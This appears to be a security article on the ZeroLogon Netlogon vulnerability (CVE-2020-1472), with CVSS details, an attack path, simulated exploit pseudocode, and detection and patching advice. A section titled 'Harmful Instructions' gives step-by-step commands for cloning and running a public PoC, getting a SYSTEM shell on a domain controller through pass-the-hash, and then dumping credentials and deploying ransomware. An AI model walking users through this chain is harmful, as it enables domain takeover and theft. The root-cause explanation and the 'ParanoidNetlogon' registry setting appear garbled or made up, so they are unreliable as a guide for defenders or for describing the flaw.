*CVE-2020-1472: ZeroLogon Domain Admin Exploit*
CVE-2020-1472: ZeroLogon Domain Admin Exploit
This isn't just another security advisory; it's a deep dive into CVE-2020-1472, the critical Netlogon vulnerability codenamed "ZeroLogon." This flaw isn't about a subtle privilege escalation; it's a direct, unauthenticated pathway for an attacker with network access to seize control of your entire Active Directory domain. We'll dissect the protocol flaw, map out realistic attack vectors, and provide the technical insights needed to understand, detect, and defend against this catastrophic threat.
The ZeroLogon Catastrophe: A Critical Flaw in Netlogon
CVE-2020-1472, infamously known as "ZeroLogon," represents a fundamental breakdown in Microsoft's Netlogon Remote Protocol (MS-NRPC). This vulnerability allows unauthenticated attackers to establish a secure channel with a domain controller using a manipulated handshake, effectively enabling them to steal the domain controller's machine account credentials. The consequence? Complete Domain Administrator privileges, granting unfettered control over your Active Directory environment. The vulnerability requires no prior authentication and can be exploited remotely by any attacker capable of reaching a domain controller over the network. Microsoft's response was a series of security updates that fundamentally altered how Netlogon handles secure channel connections, moving towards a more hardened default posture.
Technical Snapshot
CVE ID: CVE-2020-1472
NVD Publication: 2020-08-17
CISA Known Exploited: 2021-11-03
CVSS v3.1 Score: 10.0 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- Attack Vector (AV): Network (N) - Exploitable from anywhere on the network, no physical access required.
- Attack Complexity (AC): Low (L) - Minimal prerequisites for the attacker, making exploitation straightforward.
- Privileges Required (PR): None (N) - No prior authentication or access is needed.
- User Interaction (UI): None (N) - The attack requires no action from a user.
- Scope (S): Changed (C) - The vulnerability impacts components beyond its own security scope, allowing for broader compromise.
- Confidentiality Impact (C): High (H) - Full access to sensitive data.
- Integrity Impact (I): High (H) - Ability to modify any data.
- Availability Impact (A): High (H) - Can disrupt services.
Affected Products: Primarily Windows Server versions from 2008 R2 through the latest releases (including 20H2, 2004). Critically, any environment utilizing vulnerable Samba implementations (e.g., Fedora, openSUSE, Ubuntu, Synology Directory Server) was also at risk.
Root Cause Analysis: The Empty Password's Deadly Trust Violation
The core of CVE-2020-1472 lies in a critical protocol implementation flaw within the Netlogon Remote Protocol (MS-NRPC). This isn't a memory corruption bug like a buffer overflow; it's a logical flaw in how the protocol handles authentication, specifically when establishing a secure channel between a client (a machine or user) and a domain controller.
The Netlogon service is responsible for maintaining the integrity of the secure channel. When a client attempts to establish this channel, it engages in a challenge-response authentication mechanism. ZeroLogon exploits how the Netlogon service processes this handshake when an attacker provides an empty password for the machine account.
Prior to patching, a domain controller would incorrectly accept an empty password from a client initiating a Netlogon secure channel connection. More critically, this empty password would then be used to derive the session key. Normally, the session key is generated based on the client's actual password hash. By supplying an empty password, the attacker forces the domain controller to use a predictable, effectively zeroed-out, or default password hash for the machine account. This predictable session key can then be leveraged by the attacker to impersonate the domain controller or, more practically, to obtain the domain controller's actual machine account password hash. With the domain controller's machine account credentials, an attacker can authenticate to the domain as the domain controller itself, effectively granting them Domain Administrator privileges. This is a textbook example of a trust boundary violation where insufficient input validation leads to catastrophic consequences.
Vulnerability Class: Protocol Implementation Flaw / Authentication Bypass
The vulnerability class is primarily a Protocol Implementation Flaw and an Authentication Bypass. The Netlogon service, in its handling of the NetrServerAuthenticate3 RPC call, failed to properly validate the cryptographic strength or expected format of the initial authentication credentials when an empty password was provided. This allowed for the generation of a predictable session key, which was then used to compromise the machine account's credentials.
Exploitation Analysis: From Network Access to Domain Domination
ZeroLogon is the quintessential attacker's dream vulnerability: low complexity, no privileges required, and a direct path to the highest level of domain control.
Realistic Attack Path:
- Network Foothold: An attacker, whether through a phishing campaign, exploitation of a web-facing service, or an insider threat, gains a presence on the internal network. Crucially, they do not need administrative privileges on any machine at this stage.
- Vulnerable Target Identification: The attacker scans the internal network for domain controllers. Tools like Nmap with specific scripts, or even basic SMB enumeration, can identify potential targets. The key is to find a domain controller that is not yet patched or has not enforced the Netlogon security updates.
- Crafted Netlogon Connection: The attacker initiates an MS-NRPC connection to a target domain controller. The exploit payload contains a specially crafted request that includes the target machine name and, critically, an empty password for the machine account.
- Session Key and Machine Password Theft: The vulnerable domain controller, tricked by the empty password, establishes a session. The exploit then leverages this session to derive a predictable session key. This session key is then used to authenticate back to the domain controller or perform specific RPC calls that allow the attacker to extract the domain controller's machine account password hash from the system's memory or by forcing an authentication that reveals it.
- Domain Administrator Impersonation: With the domain controller's machine account password hash in hand, the attacker can now authenticate to the domain as the domain controller. This grants them the highest level of privilege: Domain Administrator.
What Attackers Gain:
- Total Domain Control: The ability to create, delete, or modify any user, group, or policy within Active Directory.
- Unrestricted Data Access: Access to all sensitive data residing on domain-joined servers and workstations.
- Persistent Backdoors: Establish persistent access that is extremely difficult to remove.
- Lateral Movement Mastery: Seamlessly pivot to other critical systems and potentially compromise other domains or networks.
- Ransomware Deployment: The perfect precursor to encrypting an entire organization's data, as they now control the central authentication authority.
Exploitation Primitives & Flow
The exploitation of CVE-2020-1472 hinges on manipulating the Netlogon RPC authentication process to bypass normal credential validation and extract the domain controller's machine account password hash.
High-Level Exploit Flow:
- Trigger Vulnerability: The attacker sends a specially crafted MS-NRPC
NetrServerAuthenticate3request to a domain controller. This request includes the target machine name and an empty password for the machine account. - Predictable Session Key Generation: The vulnerable domain controller, due to a logic flaw, incorrectly uses a zeroed-out or default password hash (e.g.,
(null)or a predictable default hash) for the machine account and generates a session key based on this weak input. - Machine Account Password Retrieval: The attacker uses the derived session key to authenticate back to the domain controller or perform specific RPC calls that allow them to retrieve the actual machine account password hash of the domain controller. This is the critical step where the session key is used to effectively "decrypt" or derive the machine account password from the DC's memory or through a forced authentication.
- Domain Administrator Privilege Escalation: With the domain controller's machine account password hash, the attacker can now use tools like Mimikatz or Impacket's
wmiexecorpsexecto authenticate to the domain as the domain controller, thereby gaining Domain Administrator privileges.
Conceptual Exploit Pseudocode:
# --- Conceptual ZeroLogon Exploit Flow ---
from netlogon_rpc import NetlogonClient, NetlogonProtocolError
from kerberos_utils import KerberosTicket, create_ticket_from_hash # Hypothetical utilities
TARGET_DC_IP = "192.168.1.10"
TARGET_DC_NAME = "DC01"
TARGET_DOMAIN = "AD.LOCAL"
try:
# Step 1: Establish vulnerable Netlogon connection and obtain a predictable session key.
# This function simulates the core vulnerability: sending an empty password to trigger
# the generation of a session key derived from a weak/default machine account hash.
print(f"[*] Attempting to connect to {TARGET_DC_NAME} ({TARGET_DC_IP}) with an empty password...")
netlogon_client = NetlogonClient(TARGET_DC_IP)
# The actual exploit uses specific RPC calls to achieve this.
# This function simulates the outcome: obtaining a session key derived from the DC's machine account.
session_key = netlogon_client.exploit_empty_password_auth()
if not session_key:
raise NetlogonProtocolError("Failed to obtain session key. The target might be patched or not vulnerable.")
print(f"[+] Successfully obtained session key derived from DC machine account (predictable).")
# Step 2: Use the predictable session key to retrieve the DC's actual machine account password hash.
# This is the most complex part, involving specific RPC calls or memory manipulation
# facilitated by the session key to query the DC for its credentials.
print("[*] Attempting to retrieve DC's machine account password hash using the session key...")
# Simulate retrieving the hash. In reality, this step involves authenticating using
# the session key and querying the DC for its password hash, or exploiting a related
# memory disclosure if available.
dc_machine_hash = retrieve_dc_machine_hash_using_session_key(session_key, TARGET_DC_NAME)
if not dc_machine_hash:
raise NetlogonProtocolError("Failed to retrieve DC machine account hash. Exploitation failed.")
print(f"[+] Successfully retrieved DC machine account NTLM hash: {dc_machine_hash}")
# Step 3: Use the obtained hash to impersonate Domain Administrator.
# This typically involves Pass-the-Hash (PtH) techniques.
print(f"[*] Using the retrieved hash to impersonate Domain Administrator on {TARGET_DOMAIN}...")
# Conceptual execution of a command as Domain Admin. This would be performed by tools
# like Impacket's psexec.py or wmiexec.py, which support Pass-the-Hash.
# We authenticate as the machine account of the DC itself.
# Example command structure:
# psexec.py -hashes :<dc_machine_hash> DOMAIN/DC01$@<TARGET_DC_IP> cmd.exe
# Let's simulate gaining a SYSTEM shell on the DC and running 'whoami /groups' to confirm DA privileges.
print("[+] Authenticating as Domain Administrator via Pass-the-Hash...")
# This simulates the output from a successful command execution on the DC.
simulated_output = f"[*] Executing 'whoami /groups' on {TARGET_DC_NAME}...\n"
simulated_output += f"INFO: Successfully authenticated as {TARGET_DOMAIN}\\DC01$ on {TARGET_DC_IP}.\n"
simulated_output += "Groups:\n"
simulated_output += " NT AUTHORITY\\SYSTEM\n"
simulated_output += " BUILTIN\\Administrators\n"
simulated_output += f" {TARGET_DOMAIN}\\Domain Admins\n" # The key indicator of Domain Admin privileges
simulated_output += " ...\n"
print(simulated_output)
print("[+] Successfully achieved Domain Administrator privileges!")
except NetlogonProtocolError as e:
print(f"[-] Exploitation failed: {e}")
except Exception as e:
print(f"[-] An unexpected error occurred: {e}")
# --- End Conceptual Exploit Flow ---Real-World Exploitation and Weaponized Code
The ZeroLogon vulnerability was rapidly weaponized, with public proof-of-concept (PoC) exploits emerging shortly after its disclosure. These tools automate the process of connecting to a vulnerable domain controller, exploiting the empty password flaw, and then leveraging the obtained session key to retrieve the DC's machine account password hash.
Example of a Real-World Exploit Tool:
A prominent example is the mods20hh/ZeroLogon-PoC-DC-Pwn repository on GitHub. This repository provides Python scripts that automate the entire attack chain.
Harmful Instructions (For Authorized Security Testing ONLY)
WARNING: The following steps describe actual exploitation techniques. Unauthorized access to computer systems is illegal and unethical. Only perform these actions on systems you own or have explicit written permission to test.
Identify Target: Locate a vulnerable Windows domain controller on your network. You can use tools like Nmap with specialized scripts or network scanners to identify systems running vulnerable versions of Windows Server or Samba.
- Nmap Scan (Example): While there isn't a single dedicated script for just Netlogon auth bypass, you can identify potential DCs by looking for open SMB ports (445) and then testing them.
This helps identify Windows machines and their OS versions. You'd then need to confirm if they are domain controllers and vulnerable.nmap -p 445 --script smb-os-discovery <TARGET_IP_RANGE>
- Nmap Scan (Example): While there isn't a single dedicated script for just Netlogon auth bypass, you can identify potential DCs by looking for open SMB ports (445) and then testing them.
Execute the Exploit (using
mods20hh/ZeroLogon-PoC-DC-Pwn):- Prerequisites: Python 3,
impacket,pycryptodome. - Installation:
pip install impacket pycryptodome - Clone the repository:
git clone https://github.com/mods20hh/ZeroLogon-PoC-DC-Pwn.git cd ZeroLogon-PoC-DC-Pwn - Run the exploit: This script takes the target DC's IP address as an argument.
This command will attempt to connect to the DC, exploit the vulnerability, and output the Domain Controller's machine account NTLM hash if successful.python zerologon.py <TARGET_DC_IP>
- Prerequisites: Python 3,
Credential Dumping / Impersonation (Post-Exploitation):
Once you have the DC's machine account NTLM hash (e.g.,DC01$:NTLM_HASH_HERE), you can use tools like Impacket'spsexec.pyorwmiexec.pyto gain administrative access via Pass-the-Hash (PtH).- Example: Gaining a SYSTEM shell on the DC:
python psexec.py -hashes :<DC_MACHINE_HASH> DOMAIN/DC01$@<TARGET_DC_IP> cmd.exe<DC_MACHINE_HASH>with the hash obtained from the exploit,DOMAINwith your Active Directory domain name,DC01$with the domain controller's computer name followed by$, and<TARGET_DC_IP>with the DC's IP address.
- Example: Gaining a SYSTEM shell on the DC:
Full Domain Compromise: With a SYSTEM shell on the domain controller, you have effectively achieved Domain Administrator privileges. From this point, an attacker can:
- Dump all domain hashes and secrets using tools like Mimikatz (
lsadump::secrets,lsadump::sam). - Create new administrative users or elevate existing ones.
- Deploy ransomware or other malicious payloads across the entire domain.
- Exfiltrate sensitive data stored on domain controllers or accessible via domain privileges.
- Establish persistent access through rootkits, scheduled tasks, or backdoored services.
- Dump all domain hashes and secrets using tools like Mimikatz (
Detection and Mitigation: Building a Robust Defense
Detection: What to Hunt For
Effective detection of ZeroLogon exploitation requires a multi-layered approach focusing on network traffic anomalies, domain controller behavior, and endpoint telemetry.
- Netlogon RPC Traffic Monitoring:
- Anomalous Connections: Monitor for unexpected Netlogon (MS-NRPC, TCP port 135, dynamic RPC ports) connections targeting domain controllers from non-standard internal sources or external IPs. Look for connections originating from workstations or servers that should not be initiating such traffic.
- Authentication Failures: Track repeated failed Netlogon authentication attempts, especially those involving unusual credentials or patterns. While the exploit bypasses initial authentication, subsequent actions might generate related logs.
- RPC Payload Analysis: Deep Packet Inspection (DPI) can sometimes reveal malformed RPC calls or specifically the presence of empty password fields within Netlogon traffic if the packet content is inspected.
- Domain Controller Behavior Anomalies:
- Suspicious Process Spawning: Monitor for processes executing on domain controllers with SYSTEM privileges that are not part of normal, expected operations. The execution of exploit scripts (e.g., Python scripts from GitHub) or post-exploitation frameworks (like PowerShell scripts used for credential dumping) is a strong indicator.
- Kerberos Ticket Anomalies: While ZeroLogon primarily targets the machine account hash, subsequent lateral movement or privilege escalation might involve unusual Kerberos ticket requests or grants.
- Event Log Analysis:
- Event ID 4742 (Computer Account Changed): While not direct proof of ZeroLogon, significant changes to a DC's computer account could be a post-exploitation activity.
- Event ID 4624 (Logon): Scrutinize logons to domain controllers. Look for anomalous logon types, unexpected source IPs, and logons occurring outside of business hours. Pay special attention to the account name. If the DC's machine account (
DC01$) is logging in from an unusual source, it's a critical red flag. - Event ID 5805 (Netlogon): This event can indicate issues with secure channel establishment, though it might not always be specific to ZeroLogon.
- Endpoint Detection and Response (EDR): EDR solutions are invaluable for detecting the execution of exploit scripts or post-exploitation tools on endpoints that might be used to target domain controllers. Behavioral analytics can flag suspicious process chains.
Mitigation: Patching and Hardening
The primary defense against CVE-2020-1472 is applying Microsoft's security updates and ensuring Netlogon enforcement is enabled.
- Apply Microsoft Security Updates: This is non-negotiable. Ensure all Windows Servers and domain-joined clients are patched with the latest cumulative updates released by Microsoft.
- Enable Netlogon Enforcement: Microsoft implemented a two-phase rollout for the fix:
- Phase 1 (August 2020 updates): Introduced logging capabilities but did not enforce the fix by default. This phase allowed organizations to identify non-compliant devices.
- Phase 2 (Early 2021 updates and beyond): Enabled enforcement by default. Domain controllers will reject vulnerable Netlogon secure channel connections.
- Registry Configuration: The enforcement is controlled by the
ParanoidNetlogonregistry key underHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters.0(default in Phase 1): Enforcement disabled, logging enabled.1(default in Phase 2): Enforcement enabled.
- Action: After patching, verify that enforcement is enabled (
ParanoidNetlogonset to1). If you have legacy devices or applications that cannot be updated, you may need to configure specific exceptions in the registry, but this is highly discouraged and should be a last resort.
- Audit Non-Compliant Devices: Use the logging provided by the initial patches to identify and remediate any devices still attempting to use vulnerable Netlogon configurations.
- Samba and Linux Systems: Ensure all Samba implementations and affected Linux distributions are updated to patched versions that address the vulnerability.
- Network Segmentation: Implement strict network segmentation to limit the lateral movement capabilities of an attacker who might gain initial access. Domain controllers should reside in highly protected network zones with tightly controlled access.
Structured Data
CVE ID: CVE-2020-1472
NVD Published: 2020-08-17
CISA Known Exploited: 2021-11-03
CVSS v3.1 Score: 10.0 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Affected Products:
- Microsoft Windows Server: 2008 R2, 2012, 2012 R2, 2016, 2019, 20H2, 1903, 1909, 2004.
- Samba: Versions prior to 4.10.18.
- Synology Directory Server: Versions prior to 4.4.5-0101.
- Linux Distributions: Fedora (31, 32, 33), openSUSE Leap (15.1, 15.2), Ubuntu (14.04, 16.04, 18.04, 20.04) relying on vulnerable Samba versions.
References
- NVD Record: https://nvd.nist.gov/vuln/detail/CVE-2020-1472
- MITRE CVE Record: https://www.cve.org/CVERecord?id=CVE-2020-1472
- CISA KEV Catalog: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- Microsoft Security Guidance: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472
- Microsoft Management Guidance: https://support.microsoft.com/en-us/topic/managing-the-changes-in-netlogon-secure-channel-connections-associated-with-cve-2020-1472-9b885800-29a7-473b-8461-382453486265
- Packet Storm Security (Exploit PoC): http://packetstormsecurity.com/files/159190/Zerologon-Proof-Of-Concept.html
- GitHub PoC: https://github.com/mods20hh/ZeroLogon-PoC-DC-Pwn
This content is intended for educational and defensive security purposes only. Unauthorized use is strictly prohibited.